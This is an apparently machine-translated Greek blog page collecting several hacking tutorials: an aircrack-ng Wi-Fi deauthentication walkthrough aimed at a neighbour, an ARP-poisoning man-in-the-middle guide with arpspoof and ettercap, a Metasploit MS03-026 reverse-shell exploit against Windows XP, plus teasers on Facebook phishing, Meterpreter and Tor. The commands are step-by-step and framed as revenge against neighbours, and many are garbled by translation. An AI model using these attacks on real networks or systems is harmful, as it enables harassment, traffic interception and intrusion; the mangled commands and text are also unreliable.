Εμφάνιση αναρτήσεων με ετικέτα Home. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Home. Εμφάνιση όλων των αναρτήσεων
Πέμπτη 10 Ιουλίου 2014
Καλώς ήρθατε και πάλι, χάκερ μου
Είχατε ποτέ ένα ενοχλητικό γείτονα του οποίου σκυλί γαβγίζει όλη τη νύχτα, ο οποίος έχει ξέφρενα πάρτι που έχετε κρατήσει ξύπνιο, ή που καλεί τους μπάτσους, όταν έχετε ένα δυνατό κόμμα; Εδώ είναι ένας απλός τρόπος για να πάρει ακόμη και μαζί τους χωρίς ποτέ τους να το γνωρίζουν.
Κοινωνική Μηχανική, Μέρος 2: Hacking ενός φίλου στο Facebook Κωδικός
Τι είναι το Phishing;
Το phishing είναι η πράξη του να εξαπατήσουν κάποιον σε υπογραφή σε μια πλαστή ιστοσελίδα, η οποία μιμείται ένα πραγματικό χώρο, όπως το Facebook. Η σελίδα phishing θα καταγράψει τις πιστοποιήσεις που ο χρήστης εισάγει στο πεδίο κωδικού πρόσβασης, και συνήθως περνά απαρατήρητος με τις σωστές συνθήκες και κάποια Κοινωνική Μηχανική.
Hack Like a Pro: Πώς να πάρει Ακόμη και με ενοχλητικό γείτονα σας από την πρόσκρουση τους Off WiFi τους Δίκτυο-Απαρατήρητα
Καλώς ήρθατε και πάλι, χάκερ μου μαθητευομένων! My πρόσφατες δημοσιεύσεις εδώ ήταν πολύ τεχνικής φύσεως, έτσι σκέφτηκα ότι θα ήθελα να έχουν λίγη διασκέδαση με αυτό.
Είχατε ποτέ ένα ενοχλητικό γείτονα του οποίου σκυλί γαβγίζει όλη τη νύχτα, ο οποίος έχει ξέφρενα πάρτι που έχετε κρατήσει ξύπνιο, ή που καλεί τους μπάτσους, όταν έχετε ένα δυνατό κόμμα; Εδώ είναι ένας απλός τρόπος για να πάρει ακόμη και μαζί τους χωρίς ποτέ τους να το γνωρίζουν.
Σχεδόν ο καθένας αυτές τις μέρες έχει ένα Wi-Fi router που έχει συσταθεί στο σπίτι τους ώστε να μπορούν να έχουν πρόσβαση στο Διαδίκτυο σε οποιοδήποτε δωμάτιο ή γωνία και σχισμή μέσα στο σπίτι τους. Αυτό το hack είναι στην γκρίζα περιοχή του νόμου, κατά πάσα πιθανότητα δεν είναι παράνομη, και σχεδόν αδύνατο να εντοπιστεί. Τι θα πάμε να κάνουμε είναι απλά να χτυπήσει ή να αποσυνδέσετε τον πλησίον μας από τη σύνδεση Wi-Fi τους κάθε φορά που συνδέεστε, οδηγώντας τους τρελό και αφήνοντάς τους χωρίς πρόσβαση στο διαδίκτυο (προσωρινά).
Θα χρειαστείτε το καλύτερο κροτίδα λογισμικό Wi-Fi για να το κάνετε αυτό hack- aircrack-ng -οπότε ας ανάψουν μας BackTrack και να πάρει ενοχλητικό ότι ενοχλητικό γείτονα.
Τι θα πρέπει να κάνει ουσιαστικά είναι:
- Να πάρει το BSSID του σημείου πρόσβασης του γείτονα (αυτό είναι το MAC του σημείου πρόσβασης),
- Να πάρει τη διεύθυνση MAC του γείτονά σας, όταν συνδεθεί με το Wi-Fi AP, και ...
- Χρησιμοποιώντας ότι η διεύθυνση MAC για να de-εγκρίνει τη σύνδεσή τους. Στην πραγματικότητα, με το aircrack-ng είναι μια πραγματικά απλή αμυχή.
Ας ανοίξουμε aircrack-ng σε BackTrack πηγαίνοντας να κάνουν πίσω ,Αξιοποίηση Εργαλεία , ασύρματο , WLAN εκμετάλλευση , και στη συνέχειαaircrack-ng .
Όπως μπορείτε να δείτε παρακάτω, έχουμε ένα τερματικό τώρα ανοικτό στο aircrack-ng. Ας ρίξουμε πρώτα μια ματιά σε ασύρματη κάρτα μας. Στο Linux, η πρώτη ασύρματη κάρτα έχει οριστεί wlan0 . Μπορούμε να το κάνουμε αυτό, πληκτρολογώντας:
- iwconfig wlan0
Όπως μπορείτε να δείτε, το Linux έρχεται πίσω με κάποιες βασικές πληροφορίες για την ασύρματη κάρτα στο σύστημά μας. Το πρώτο πράγμα που θέλουμε να κάνουμε είναι να βάλετε ασύρματη κάρτα μας στη λειτουργία της οθόνης. Αυτό μας επιτρέπει να δούμε και να συλλάβει όλες τις ασύρματες κυκλοφορίας:
- airmon-ng ξεκινήσει wlan0
Σημειώστε ότι airmon έχει μετονομαστεί ασύρματη συσκευή σας για ναmon0 . Αυτό είναι κρίσιμης σημασίας, όπως ασύρματη κάρτα σας θα πρέπει τώρα να αναφέρεται από αυτό το νέο όνομα.
Τώρα που η ασύρματη κάρτα είναι σε λειτουργία παρακολούθησης, θέλουμε να δούμε όλα τα σημεία ασύρματης πρόσβασης στο φάσμα.
- airdump-ng mon0
Στο παραπάνω screenshot, μπορούμε τώρα να δούμε όλα τα σημεία ασύρματης πρόσβασης σε σειρά με όλες τις βασικές πληροφορίες τους.Ενοχλητικό γείτονα μας, είναι το σημείο πρόσβασης 7871 .
Σημειώστε ότι airodump μας δίνει τη BSSID του σημείου πρόσβασης, τη δύναμή τους, το κανάλι, την ταχύτητα, κλπ. Αυτό που χρειαζόμαστε εδώ είναι η BSSID. Στην περίπτωσή μας, είναι 0α: 86:30:74:22:77 . Μπορούμε να χρησιμοποιήσουμε αυτή τη διεύθυνση σημείου πρόσβασης στην επόμενη εντολή. Πρέπει να χρησιμοποιήσετε το BSSID του σημείου πρόσβασης ενοχλητικό γείτονα σας και το κανάλι που χρησιμοποιούν.
- airodump-ng mon0 - bssid BSSIDaddress - κανάλι 6
Αυτό εντολές που μας συνδέει με το σημείο πρόσβασης του εν λόγω ενοχλητικό γείτονα. Χρειαζόμαστε τώρα για εκείνο το ενοχλητικό γείτονα για να συνδεθείτε στο σημείο πρόσβασης του για να πάρει τη διεύθυνση MAC της ασύρματης κάρτας του. Στη συνέχεια, πρέπει να να πλαστογραφήσει τη διεύθυνση MAC του.
Μόλις ο γείτονας συνδέει, μπορούμε να δούμε και να αντιγράψετε τη διεύθυνση MAC του. Τώρα που έχουμε τη διεύθυνση MAC, μπορούμε να στείλουμε πακέτα de-άδεια στο σημείο πρόσβασης και αποσυνδέστε τους.
- aireplay-ng - deauth 1-α mon0 MacAddress
Τώρα, όταν ενοχλητικό γείτονα σας συνδέει, μπορείτε να αποσυνδέσετε!Όσοι από εσάς με κάποιες ικανότητες scripting να γράψετε ένα απλό σενάριο που θα τον χτυπήσει από αυτό το Wi-Fi, ας πούμε, κάθε 30 δευτερόλεπτα για να είναι πραγματικά ενοχλητικό, ή 30 λεπτά να είναι ελαφρώς ενοχλητικό. Εάν το κάνετε αυτό hack μόνο όταν κάνει κάτι ιδιαίτερα ενοχλητικό, θα μπορούσε να αρχίσει να πιστεύουν ότι οι θεοί να τιμωρηθεί για την κακή συμπεριφορά του!
Hack Like a Pro: Ξεκινώντας με BackTrack, Νέο Σύστημα Hacking σας
Καλώς ήρθατε και πάλι, γενέσει χάκερ μου!
Σε ένα από τα πρόσφατα άρθρα μου, σας έδειξε πώς να εγκαταστήσετε το BackTrack ως ένα σύστημα διπλής εκκίνησης σε έναν υπολογιστή με Windows. Σε αυτό το σεμινάριο, εγώ θα σας καθοδηγήσει μέσα από BackTrack, δίνοντάς σας μια περιήγηση στα πιο βασικά χαρακτηριστικά για το hacker-να-να.
Τετάρτη 9 Ιουλίου 2014
Πώς να Spy σχετικά με την κυκλοφορία Ιστού για όλους τους υπολογιστές στο δίκτυό σας: Μια Εισαγωγή σε δηλητηρίαση ARP
Όταν ο υπολογιστής σας συνδέεται πρώτα σε ένα δίκτυο, στέλνει ένα αίτημα στο δίκτυο για να μισθώσει μια διεύθυνση IP από το router. Ο δρομολογητής στη συνέχεια μισθώνει στον υπολογιστή σας μια αχρησιμοποίητη διεύθυνση IP, το οποίο χρησιμοποιείται ως μια μοναδική διεύθυνση δρομολόγησης για την αποστολή της κυκλοφορίας που προορίζεται για εσάς , για εσάς. Όπως πάντα τείνει να, αυτή η μέθοδος έχει αδυναμίες του.
Όταν είστε σε ένα δίκτυο, σε τοπικούς εισβολείς μπορεί να εκτελέσει αυτό που ονομάζεται man-in-the-middle επίθεση. Κατά την εκτέλεση της επίθεσης, που καθιστά δυνατή για να οσφραίνομαι μη κρυπτογραφημένα δεδομένα κίνησης και τομής, όπως κωδικούς πρόσβασης ή μηνύματα ηλεκτρονικού ταχυδρομείου. Έτσι, εάν είστε ένας από τους πολλούς ανθρώπους που δεν χρησιμοποιούν οποιαδήποτε μορφή πρωτόκολλο κρυπτογράφησης κατά την περιήγησή σας στο διαδίκτυο δημόσιο, τα δεδομένα σας είναι ανοικτή σε ανάλυση, μεταξύ άλλων. Μια επίθεση μπορεί να επιτύχει μόνο όταν ο εισβολέας μπορεί να μιμηθεί κάθε τελικό σημείο προς ικανοποίηση των άλλων-αποτελεί επίθεση στο αμοιβαίο έλεγχο ταυτότητας . Τα περισσότερα πρωτόκολλα κρυπτογράφησης περιλαμβάνουν κάποια μορφή τελικού σημείου ελέγχου ταυτότητας ειδικά για να αποτρέψει τις επιθέσεις MITM. Για παράδειγμα, SSL ελέγχει την ταυτότητα του διακομιστή χρησιμοποιώντας μια αμοιβαία αξιόπιστη αρχή έκδοσης πιστοποιητικών .
Για να εκτελέσετε αυτό σε τοπικό επίπεδο, θα πρέπει να την κοροϊδία τους εαυτούς μας να μοιάζουν με router μας και να αρχίσετε να ζητούν κυκλοφορίας από άλλο υπολογιστή στο δίκτυό μας. Για να ξεγελάσουν έναν άλλο υπολογιστή του δικτύου μας στην αποστολή της κυκλοφορίας τους με τη δική μας, θα πρέπει να ARP δηλητήριο. Αυτό θα κάνει ο υπολογιστής-στόχος πιστεύουμε ότι είναι η προεπιλεγμένη πύλη και ότι θα πρέπει να στείλει την κυκλοφορία του μέσα από εμάς. Μετά, χαράζουμε την κίνηση στην πραγματική προεπιλεγμένη πύλη και την πύλη θα στείλει την κίνηση πίσω ότι μπορούμε να διαβιβάσει στο θύμα. Τα πάντα φαίνεται να είναι φυσιολογική και εργάζονται στα δύο άκρα.
ARP ή ένα ροσφώνηση R ΨΗΦΙΣΜΑ P ρωτόκολλο είναι μια μέθοδος για να αφήσει το χάρτη του δικτύου από IPs αντί να δίνει σε κάθε υπολογιστή ενός πίνακα της χαρτογράφησης. Είναι ευάλωτα σε δηλητηρίαση, επειδή δεν υπάρχει μέθοδος για τον έλεγχο της γνησιότητας των απαντήσεων ARP ενσωματωμένη στο πρωτόκολλο. Έτσι, οι απαντήσεις μπορεί να πλαστογραφηθεί από άλλες διευθύνσεις στο δίκτυο.
Προειδοποιήσεις
- Είμαι σοβαρός όταν λέω, "Κάντε το αυτό στο οικιακό σας δίκτυο".Καθένας με ένα αξιοπρεπές σύστημα ανίχνευσης εισβολής μπορεί να εντοπίσει εύκολα ένα ARP δηλητηρίαση επίθεση από την ανάλυση των πακέτων λογικά. Γιατί θα ήταν ένας υπολογιστής στο δίκτυο να ζητήσει και την αποστολή ARP απαντήσει πλαίσια ζητούν έναν άλλο υπολογιστή να συνδεθεί με αυτό; Ένας φίλος μου ήταν στο κολλέγιο και δηλητηρίαζε το δίκτυο και πιάστηκε μέσα σε 10 λεπτά (που ισχυρίζονται ότι χρησιμοποιείται τριγωνισμού, αλλά ποιος ξέρει).
Απαιτήσεις
- Linux OS
- Διαχειριστής ή ρίζα προνόμια
- Τουλάχιστον δύο υπολογιστές στο οικιακό σας δίκτυο
Βήμα 1 Λήψη και εγκατάσταση του εργαλείων
Κείμενο σε έντονους σημαίνει ότι είναι ένα τερματικό.
Πρέπει να συγκεντρώσει όλα τα εργαλεία μας για να αποδείξει την τεχνική αυτή για τον εαυτό μας.
Αποκτήστε τα ακόλουθα πακέτα από το αποθετήριο σας:
- dsniff
- iptables
- ettercap
- nmap
Για να εγκαταστήσετε τα πακέτα:
- Εξάγετε τα πακέτα. πίσσα zxvf <package name>
- Διαμορφώστε τα πακέτα για τη σύνταξη. . / configure
- Μεταγλωττίσετε και να εγκαταστήσετε.
sudo make && sudo make install
Βήμα 2 ARP Poison & Run Ettercap
- Αποκτήστε ασύρματη κάρτα σας σε λειτουργία παρακολούθησης, ώστε να είστε σε θέση να sniffing κυκλοφορίας. sudo ifconfig wlan0 κάτω && sudo ifconfig wlan0 οθόνη αναμονής && sudo ifconfig wlan0 up
- Τώρα πρέπει να σαρώσει το τοπικό δίκτυο για την IP στόχο μας. Αυτό σημαίνει ότι έχουμε πινγκ όλοι στο τοπικό δίκτυο και όταν παίρνουμε απαντήσεις, μπορούμε να δούμε IP τους και να πάρει τους ως στόχος. sudo nmap-SP 192.168.1.0/24
- Στη συνέχεια, ενεργοποιήστε την προώθηση IP ώστε να μπορούμε να foward κυκλοφορίας του υπολογιστή-στόχο μας. sudo echo 1> / proc/sys/net/ipv4/ip_forward
- Προκειμένου να διαβιβάσει την κίνηση σωστά, πρέπει να ανακατευθύνονται σε ένα λιμάνι που μπορούμε να ακούσουμε σε πριν από τη διαβίβαση. iptables-t nat-A tcp PREROUTING-p - προορισμού-port 80-j REDIRECT - to-θύρα 1024
- Ήρθε η ώρα να ARP δηλητήριο δεύτερο υπολογιστή σας για να στείλετε κυκλοφορία σε σας. sudo arpspoof-i [interface]-t [router ip, ip στοχεύουν]
- Τέλος, έχει συσταθεί ettercap να συλλάβει την κυκλοφορία ανάμεσα σε εσάς και τον πελάτη.
sudo ettercap-Tq-i wlan0-w ~ / Desktop / cap
Όταν ο υπολογιστής-στόχος στέλνει enecrypted δεδομένων μέσω του δικτύου (μη HTTPS ιστοσελίδες), ettercap θα το δείτε και να απορρίπτουν τα πακέτα στο αρχείο "καπέλο" στην επιφάνεια εργασίας. Εξετάστε τα πακέτα με ένα πρόγραμμα επεξεργασίας hex. Κάθε μη κρυπτογραφημένο πληροφορίες που θα εμφανίζονται σε δεκαεξαδική, το οποίο είναι ουσιαστικά ένας εύκολος τρόπος για να convery δυαδικά ψηφία σε δεκαεξαδικό και δεκαεξαδικό σε ASCII, το οποίο είναι αναγνώσιμο σε φυσιολογικούς ανθρώπους. Θα χρησιμοποιηθεί wxHexEditor . Όπως μπορείτε να δείτε, το "κρυφό" τα δεδομένα μπορεί να δει κανείς σε απλό κείμενο στη δεξιά πλευρά, όταν άνοιξε.
Πώς να Γίνετε Ανώνυμος στο Διαδίκτυο Χρησιμοποιώντας Tor
Το διαδίκτυο είναι ένα τρομακτικό μέρος, και αν είστε σαν κι εμένα, δεν θέλετε κανέναν που ακολουθείτε ή μαθησιακές συνήθειες της αναζήτησής σας. Είναι μια κατάφωρη παραβίαση της ιδιωτικής ζωής για τις εταιρείες να το κάνετε αυτό, αλλά τουλάχιστον έχουμε μεθόδων καταπολέμησης back-ένα εκ των οποίων είναι Tor .
Tor σημαίνει Τ ο O Ένωσης R εξωτερικό. Λειτουργεί με δωρεά bandwidth από τους χρήστες του. Tor κρυπτογραφεί την κυκλοφορία σας, στη συνέχεια τον προωθεί μέσω πολλαπλών κόμβων, όπως τα στρώματα ενός κρεμμυδιού, εξ ου και η ονομασία «The Onion Router". Σας προστατεύει καλύπτοντας την IP σας (Internet Protocol) διεύθυνση, η οποία είναι συνώνυμη με την διεύθυνση του σπιτιού σας. Θα σας προστατεύει επίσης μέσω της διοχέτευσης της κυκλοφορίας όλων σας αυτόματα, σαν να είχεδημιουργήσει ένα VPN , ή SSH σήραγγα . Τις περισσότερες φορές, το Google Sharing , ένα πρόσθετο για τον Firefox από Moxie Marlinspike , θα είναι αρκετό. Αλλά μερικές φορές πρέπει να είναι πλήρως ανώνυμη.
Τώρα, να προειδοποιήσει, Tor δεν είναι πλήρως ανώνυμη. Κάποια πράγματα έχουν μείνει στο χρήστη να καθορίσει, όπως η αλλαγή σας πράκτορα χρήστη. Ένας πράκτορας χρήστη αποκαλύπτει το λειτουργικό σας σύστημα (λειτουργικό σύστημα) και τις πληροφορίες του προγράμματος περιήγησης. Είμαι ένα καρύδι προστασία της ιδιωτικής ζωής, γι 'αυτό δεν μου αρέσει οι άνθρωποι έχουν ούτε αυτό. Επίσης, ίσως δεν πρέπει να συνδέεστε σε Facebook, όπως ότι θα αποκαλύψει προφανώς τις πληροφορίες σας.
Σε αυτό το Null Byte , θα πάμε για να πάει για λίγο πάει πέρα από το πώς να δημιουργήσει Tor, μετά την οποία θα διαβιβάσει την κυκλοφορία μου μέσα από αυτό να σας δείξει ότι λειτουργεί. Η μεθοδολογία είναι η ίδια για τα Windows και το Linux, αλλά θα χρησιμοποιούν τα Windows για να αποφευχθεί η σύγχυση.
Κατεβάστε & Ρύθμιση Tor
Ακολουθήστε μαζί με το βίντεο και τις παρακάτω οδηγίες.
Hack Like a Pro: Hacking Samba στο Ubuntu και Εγκατάσταση του Meterpreter
Γεια σου, hackers! Τώρα που έχετε hacked / ανήκει η πρώτη σας "κουτί" στοτελευταίο άρθρο μου , ας δούμε λίγο πιο κοντά σε ένα άλλο μεγάλο χαρακτηριστικό γνώρισμα του Metasploit, το Meterpreter, και τότε ας προχωρήσουμε στην πειρατεία ένα σύστημα Linux και χρησιμοποιώντας το Meterpreter για τον έλεγχο και να είναι κύριος.
Γιατί Meterpreter;
Οι περισσότεροι επιτεύγματά του είναι μόνο σε θέση να κάνει ένα πράγμα τοποθετήστε μια εντολή, να προσθέσετε ένα χρήστη, κλπ. Βασικά, είναι ένα και κάνει. Επιπλέον, αν προσθέσουμε ένα κέλυφος εντολών για μας εκμεταλλεύονται (ένα από τα πιο χρήσιμα ωφέλιμα φορτία που μπορούμε να χρησιμοποιήσουμε για το θύμα), που περιορίζονται σε διαδικασίες που μπορούν να ξεκινήσουν από τη γραμμή εντολών. Σε συστήματα με λειτουργικό σύστημα Linux, αυτό μας παρέχει ένα ισχυρό περιβάλλον για την περαιτέρω έλεγχο του συστήματος, αλλά και σε συστήματα Windows εργαζόμαστε με μια εντολή κελύφους απομείνει από το DOS και περιορισμένη λειτουργικότητα (Powershell Windows Server είναι επανόρθωση αυτής).
Αν θέλετε να προσθέσετε μια άλλη διαδικασία στο θύμα, πρέπει να εκμεταλλευτεί ξανά και ενδεχομένως την ανίχνευση του κινδύνου του συστήματος (κάθε εκμεταλλεύονται τους κινδύνους που ανιχνεύεται από ένα IDS / IPS, διαχειριστής ασφάλειας, κλπ.). Η ομορφιά της Meterpreter είναι ότι μας δίνει μια πλατφόρμα για το σύστημα θύμα για να δημιουργήσετε περισσότερη λειτουργικότητα. Είναι μια υπηρεσία που έχουμε εγκαταστήσει στο σύστημα θύμα που μας δίνει τη δυνατότητα εντολή κελύφους και πολλά άλλα. Επιπλέον, η Meterpreter επικοινωνεί πίσω σε μας κρυπτογραφούνται για stealth. Μπορούμε ακόμη και να γράψετε τα δικά μας scripts και τη διαχείρισή τους στο σύστημα προορισμού μέσω του Meterpreter. Για να συνοψίσω, Meterpreter κάνει εξαγωγή πληροφοριών από το σύστημα στόχο και καλύπτοντας τα ίχνη μας πολύ πιο εύκολη.
Τώρα που έχετε μια βασική κατανόηση της Meterpreter, ας χαράξει σε ένα σύστημα Linux, εγκαταστήστε μια αντίστροφη κέλυφος, και στη συνέχεια κάνετε αναβάθμιση στην Meterpreter για την ευκολία και την ευχαρίστηση μας. Τα βήματα πρόκειται να είναι ουσιαστικά η ίδια όπως στηνπροηγούμενη αμυχή μας , εκτός από το ότι αλλάζουμε την εκμεταλλεύονται και το ωφέλιμο φορτίο.
Ξεκινώντας
Τα περισσότερα συστήματα Linux τρέχει μια διαδικασία που ονομάζεται Samba που καθιστά το σύστημα αρχείων της διαφάνειας στα συστήματα των Windows (ή το αντίστροφο). Η διαδικασία αυτή έχει μακρά ιστορία των τρωτών σημείων που μπορούμε να εκμεταλλευτούμε. Έτσι, για να χαράξει το σύστημα Linux μας, έχουμε ξεκινήσει ένα σύστημα Linux και ξεκινήστε την υπηρεσία Samba.
Για να ξεκινήσετε, να ανοίξει ένα τερματικό.
Hack Like a Pro: πώς να εκμεταλλεύονται και να αποκτήσουν απομακρυσμένη πρόσβαση σε υπολογιστές που λειτουργούν με Windows XP
Σε μου πρώτη δόση σε αυτή τη σειρά για τα επαγγελματικά εργαλεία hacking, θα κατεβάσει και εγκαταστήσει Metasploit, το πλαίσιο εκμετάλλευσης. Τώρα, θα αρχίσουμε να εξερευνήσετε το πλαίσιο Metasploit και να ξεκινήσει μια δοκιμασμένη και αληθινή hack.
Πριν αρχίσουμε hacking, ας εξοικειωθούμε με Metasploit, έτσι ώστε όταν χρησιμοποιούν ορισμένους όρους, όλοι να καταλάβουν για να σημαίνουν το ίδιο πράγμα. Κατά την πρώτη εξέταση στο πλαίσιο Metasploit, μπορεί να είναι λίγο συντριπτική με τις διάφορες διασυνδέσεις, τις επιλογές, τις υπηρεσίες και μονάδες. Εδώ θα προσπαθήσουμε να γίνει κατανοητό, ώστε να μπορούμε να εκτελέσουμε το πρώτο μας εκμεταλλεύονται.
Ορολογία
Η ακόλουθη ορολογία δεν χρησιμοποιείται μόνο εντός του πλαισίου Metasploit, αλλά και σε ολόκληρη την επαγγελματική hacking και δοκιμών διείσδυσης κοινότητες. Ως αποτέλεσμα, κάθε επαγγελματίας σε αυτόν τον τομέα θα πρέπει να είναι εξοικειωμένοι με αυτούς τους όρους και να είναι σε θέση να διακρίνουν σαφώς τους.
- Αξιοποίηση
Αξιοποίηση είναι το μέσο με το οποίο ένας εισβολέας εκμεταλλεύεται ένα ελάττωμα ή ευπάθεια σε ένα δίκτυο, την εφαρμογή ή υπηρεσία. Ο χάκερ χρησιμοποιεί αυτό το ελάττωμα ή την ευπάθεια με τέτοιο τρόπο ώστε ο κύριος του έργου ή μηχανικός οποίες δεν είχαν προβλεφθεί, για την επίτευξη του επιθυμητού αποτελέσματος (π.χ. πρόσβαση root). Κάποιοι πιο κοινά κατορθώματα που έχετε ίσως ήδη ακούσει είναι SQL ενέσεις, υπερχειλίσεις buffer, κλπ.
- Ωφέλιμο φορτίο
Ένα ωφέλιμο φορτίο είναι το πρόγραμμα ή κώδικα που παραδίδεται στο σύστημα θύμα. Metasploit έχει προ-χτισμένη ωφέλιμα φορτία για το σκοπό αυτό περιλαμβάνεται στο εξαιρετικά χρήσιμο Meterpreter, ή μπορείτε να αναπτύξετε τη δική σας. Αυτό το ωφέλιμο φορτίο έχει σχεδιαστεί για να παρέχει τον επιτιθέμενο με κάποια ικανότητα να διαχειριστεί ή να χειριστείτε το σύστημα στόχο για τις ιδιαίτερες ανάγκες τους.
- Shellcode
Αυτό είναι ένα σύνολο οδηγιών που χρησιμοποιείται ως ωφέλιμο φορτίο, όταν λαμβάνει χώρα η εκμετάλλευση. Shellcode είναι συνήθως γραμμένο σε συμβολική γλώσσα, αλλά όχι απαραίτητα πάντα. Λέγεται "shellcode" επειδή ένα περιβάλλον γραμμής εντολών ή άλλη κονσόλα εντολών παρέχεται στον εισβολέα που μπορεί να χρησιμοποιηθεί για να εκτελέσει τις εντολές στον υπολογιστή του θύματος.
- Ενότητα
Μια λειτουργική μονάδα είναι ένα κομμάτι του λογισμικού που μπορεί να χρησιμοποιηθεί από το πλαίσιο Metasploit. Οι ενότητες αυτές είναι εναλλάξιμα και να δώσει Metasploit μοναδική δύναμη του. Οι ενότητες αυτές θα μπορούσαν να εκμεταλλευτούν ενότητες ή βοηθητικές μονάδες.
- Ακροατής
Αυτό είναι ότι η συνιστώσα που ακούει για τη σύνδεση από το σύστημα του χάκερ στο σύστημα στόχο. Ο ακροατής χειρίζεται απλά τη σύνδεση μεταξύ αυτών των συστημάτων.
- Σόου
Πλαίσιο Metasploit έχει εκατοντάδες των ενοτήτων και άλλα βοηθητικά προγράμματα. Ως εκ τούτου, δεν θα είναι σε θέση να τα θυμάμαι όλα.Ευτυχώς, η εντολή show μπορεί να αρπάξει μια λίστα με όλες τις μονάδες, τις επιλογές, τους στόχους, κλπ. στο πλαίσιο σας.
Τώρα που έχουμε τα βασικά του Metasploit έννοιες και εντολές προς τα κάτω, ας χαράξει ένα σύστημα!
Βήμα 1: Ξεκινώντας
Κατ 'αρχάς, ανοίξτε ένα τερματικό στο Linux.
Μια από τις πιο αξιόπιστες αμυχές είναι το πανταχού παρόν σύστημα Windows XP με το RPC DCOM . Είναι ένα buffer overflow επίθεση που επιτρέπει στον εισβολέα να εκτελέσει οποιοδήποτε κώδικα της επιλογής τους στο πλαίσιο ανήκει (σημειώστε το σχόλιο της Microsoft υπό την επίδραση της ευπάθειας). Microsoft προσδιορίζει ως MS03-026 στη βάση δεδομένων των προβλημάτων τους. Στην περίπτωσή μας, εμείς θα το χρησιμοποιήσετε για να ανοίξετε μια αντίστροφη κέλυφος στο σύστημα στόχο μας.
Ανοίξτε το Metasploit την κονσόλα.
msfconsole
Να είστε υπομονετικοί, παίρνει λίγο χρόνο για Metasploit να φορτώσει όλες τις λειτουργικές μονάδες της. Η τρέχουσα έκδοση του Metasploit έχει 823 εκμεταλλεύεται και 250 ωφέλιμα φορτία.
Βήμα 2: Βρείτε την Αξιοποίηση
Metasploit επιτρέπει να κάνετε αναζήτηση χρησιμοποιώντας την εντολή αναζήτησης. Στην περίπτωσή μας, είμαστε ψάχνουν για μια DCOM εκμεταλλευτεί, ώστε να μπορούμε απλά να πληκτρολογήσετε:
ΓΧΣ> αναζήτηση dcom
Βήμα 3: Ρυθμίστε την Αξιοποίηση
Τώρα, ας πω τι εκμεταλλεύονται Metasploit θέλουμε να χρησιμοποιήσουμε.Πληκτρολογήστε τη χρήση και το όνομα του εκμεταλλεύονται μας, exploit/windows/dcerpc/ms03_026_dcom.
ΓΧΣ> χρησιμοποιούν exploit/windows/dcerpc/ms03_026_dcom
Σημειώστε ότι η γραμμή έχει αλλάξει και τώρα αντικατοπτρίζει επιλεγεί μας εκμεταλλεύονται.
Βήμα 4: Ρύθμιση των επιλογών
Τώρα που έχουμε επιλέξει εκμεταλλεύονται μας, μπορούμε να ρωτήσουμε Metasploit ποιες είναι οι επιλογές μας. Με την πληκτρολόγηση επιλογές δείχνουν, Metasploit θα απαριθμήσει τις επιλογές μας στην εκτέλεση αυτό το εκμεταλλεύονται.
Επιλογές ΓΧΣ> show
Βήμα 5: Ρύθμιση Remote Host
Metasploit θα μας ρωτήσει τώρα για την Rhost. Αυτή θα είναι η διεύθυνση IP του απομακρυσμένου υπολογιστή ή το μηχάνημα είμαστε επιτίθενται.Στην περίπτωσή μας, είναι 10.0.0.3. Χρησιμοποιήστε την πραγματική διεύθυνση IP του μηχανήματος σας επιτίθενται. Εργαλεία όπως το nmap μπορεί να βοηθήσει στον εντοπισμό της διεύθυνσης IP του μηχανήματος σας επιτίθενται. Ανακοίνωση στην παραπάνω εικόνα αυτού του Metasploit μας λέει ότι θα πρέπει να χρησιμοποιούν το λιμάνι (δεσμευτική) 135.
ΓΧΣ> που Rhost 10.0.0.3
Βήμα 6: Εμφάνιση Payloads
Στη συνέχεια, ελέγξτε για να δείτε τι ωφέλιμα φορτία είναι διαθέσιμα για αυτό το εκμεταλλεύονται. Τύπος show ωφέλιμα φορτία στο Metasploit προτροπή:
ΓΧΣ> show ωφέλιμα φορτία
Βήμα 7: Ρύθμιση Ωφέλιμο φορτίο
Τώρα που μπορούμε να δούμε τι ωφέλιμα φορτία είναι διαθέσιμες, μπορούμε να επιλέξετε το γενικό / shell_reverse_tcp με τη χρήση του Metasploit κονσόλα που εντολών. Αν είναι επιτυχής, αυτό θα δημιουργήσει ένα απομακρυσμένο κέλυφος για το σύστημα στόχο που μπορούμε να την εντολή.
ΓΧΣ> που ΩΦΕΛΙΜΟ γενικής / shell_reverse_tcp
Βήμα 8: Set Local Host
Τώρα που έχουμε επιλέξει το εκμεταλλεύονται και το ωφέλιμο φορτίο, πρέπει να πούμε Metasploit τη διεύθυνση IP του μηχανήματος μας επιτίθενται. Σε αυτό το παράδειγμα, το σύστημα στόχος μας έχει μια διεύθυνση IP 10.0.0.6. Χρησιμοποιήστε την πραγματική διεύθυνση IP του συστήματος σας επιτίθενται. Εργαλεία ένα τέτοιο nmap, μπορεί να σας βοηθήσει να αποκτήσετε τις διευθύνσεις IP.
ΓΧΣ> που LHOST 10.0.0.6
Βήμα 9: Αξιοποίηση
Τώρα έχουμε εντολή Metasploit να αξιοποιήσει το σύστημα:
ΓΧΣ> εκμεταλλεύονται
Βήμα 10: Ανοίξτε ένα κοχύλι Hacked System
Πληκτρολογήστε τους εντολή συνεδρίες-i 1 για να ανοίξετε ένα κέλυφος εντολών στο σύστημα XP που θα εμφανιστεί στο Metasploit κονσόλα σας.
συνεδρίες-i 1
Για να επιβεβαιώσετε ότι το κέλυφος εντολή είναι για το σύστημα των Windows XP, πληκτρολογήστε dir για να πάρετε μια λίστα καταλόγων για το σύστημα των Windows XP που έχετε τώρα το δικό του!
C:> dir
Συγχαρητήρια! Έχετε μόλις hacked το πρώτο σας σύστημα χρησιμοποιώντας Metasploit!
Σε επόμενα μαθήματα μου, θα εξετάσουμε hacking συστήματα Linux και να σας παρουσιάσουμε το ισχυρό Meterpreter, ιδιόκτητο ωφέλιμο φορτίο Metasploit του.
Εγγραφή σε:
Αναρτήσεις (Atom)






